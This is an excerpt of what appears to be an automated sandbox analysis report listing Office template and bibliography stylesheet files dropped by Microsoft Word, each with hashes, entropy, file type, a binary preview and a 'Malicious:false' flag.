                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9191
                                                                                                                            Entropy (8bit):7.93263830735235
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                            MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                            SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                            SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                            SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4026
                                                                                                                            Entropy (8bit):7.809492693601857
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                            MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                            SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                            SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                            SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):250
                                                                                                                            Entropy (8bit):3.4916022431157345
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                            MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                            SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                            SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                            SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):292
                                                                                                                            Entropy (8bit):3.5026803317779778
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                            SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                            SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                            SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):251032
                                                                                                                            Entropy (8bit):5.102652100491927
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                            MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                            SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                            SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                            SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):252
                                                                                                                            Entropy (8bit):3.48087342759872
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                            MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                            SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                            SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                            SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4326
                                                                                                                            Entropy (8bit):7.821066198539098
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                            MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                            SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                            SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                            SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):332
                                                                                                                            Entropy (8bit):3.547857457374301
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                            SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                            SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                            SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):284415
                                                                                                                            Entropy (8bit):5.00549404077789
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                            MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                            SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                            SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                            SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):264
                                                                                                                            Entropy (8bit):3.4866056878458096
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                            MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                            SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                            SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                            SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6448
                                                                                                                            Entropy (8bit):7.897260397307811
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                            MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                            SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                            SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                            SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):278
                                                                                                                            Entropy (8bit):3.5280239200222887
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                            MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                            SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                            SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                            SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):268317
                                                                                                                            Entropy (8bit):5.05419861997223
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                            MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                            SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                            SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                            SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):286
                                                                                                                            Entropy (8bit):3.4670546921349774
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                            MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                            SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                            SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                            SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5630
                                                                                                                            Entropy (8bit):7.87271654296772
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                            MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                            SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                            SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                            SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):246
                                                                                                                            Entropy (8bit):3.5039994158393686
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                            MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                            SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                            SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                            SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3683
                                                                                                                            Entropy (8bit):7.772039166640107
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                            MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                            SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                            SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
